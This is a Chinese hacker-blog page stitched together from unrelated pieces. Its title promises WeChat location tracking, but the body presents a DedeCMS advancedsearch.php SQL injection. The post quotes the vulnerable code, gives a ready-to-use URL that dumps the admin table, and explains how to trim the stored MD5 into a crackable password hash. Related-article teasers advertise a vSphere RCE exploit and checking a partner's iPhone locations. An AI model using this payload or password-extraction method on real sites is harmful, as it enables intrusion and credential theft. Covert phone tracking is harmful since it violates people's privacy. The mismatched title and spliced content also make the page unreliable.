黑客教你定位微信地址(定位手机具 *** 置)

访客4年前黑客文章672

漏洞描述: 
健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。 

plus/advancedsearch.php 
$sql 变量未初始化。导致鸡助漏洞 

复制代码代码如下:
if($mid == 0) //必须绕过。 

showmsg('参数不正确,高级自定义搜索必须指定模型id', 'javascript'); 
exit(); 

$query = "select maintable, mainfields, addontable, addonfields, template from dede_advancedsearch where mid='$mid'"; 
$searchinfo = $dsql->GetOne($query); 
if(!is_array($searchinfo)) //囧啊,绕过有难度。 

showmsg('自定义搜索模型不存在','-1'); exit(); 

$template = $searchinfo['template'] != '' ? $searchinfo['template'] : 'advancedsearch.htm'; 
if(empty($sql)) //人品问题,成功绕过!{ 
.............. 
}else{ 
$sql = urldecode($sql); 
$query = $sql; 

$sql = urlencode($sql); 
$dlist = new DataListCP(); 
$dlist->pageSize = 20; 
$dlist->SetParameter("sql", $sql); 
$dlist->SetParameter("mid", $mid); 
............... 
$dlist->SetTemplate($templatefile); 
$dlist->SetSource($query); 
.............<*参考 
*> 


测试 *** : 

本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负! 
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 

密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码, *** 是,前减3后减1,得到16位MD5


相关文章

赤小豆是红豆吗(赤小豆和红豆是一样的吗)

  红小豆是小红豆吗(红小豆和小红豆是一样的吗)红小豆和小红豆是二种较为普遍的豆类食品,因为这二种豆看起来较为像,因此 很多人会将这二种黄豆觉得是同一种,却不清楚这二种黄豆是不一样的,她们所产生的作用...

美拍上怎么赚钱的?如何利用美拍赚钱

“软文”视頻操作步骤 根据美拍视频的这4个优势,我整理出来的思路就是:搬运商品软广视頻,留下微信号码或公众号,在微信里完成变现。 整个过程你需要用到:手机、360浏览器。 1、搬运商品软广视頻...

遮阳帽什么颜色最防晒(夏天戴遮阳帽要注意什么?)

遮阳帽什么颜色最防晒(夏天戴遮阳帽要注意什么?)夏季怎么选择适合的遮阳帽?遮阳帽什么颜色的最防晒?遮阳帽什么材质好?夏季戴遮阳帽要注意什么?跟小编一起往下看吧。 浅色帽子防晒效果好。 黑色等深色衣帽吸...

CVE-2021-21972 vSphere Client RCE复现,附POC &ampamp; EXP

CVE-2021-21972 vSphere Client RCE复现,附POC &ampamp; EXP

漏洞简介vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制...

苹果常去地点怎么看?一分钟查岗,太好用了

苹果常去地点怎么看?一分钟查岗,太好用了

有点好奇他/她常去什么位置?没事心血来潮就想查个岗?其实,iPhone很容易就可以查询得到曾经去过的地点和对应的时间,而且内容十分详细。不过友善提醒一句:擅自查询他人手机是犯法的,而且也不利于相处,除...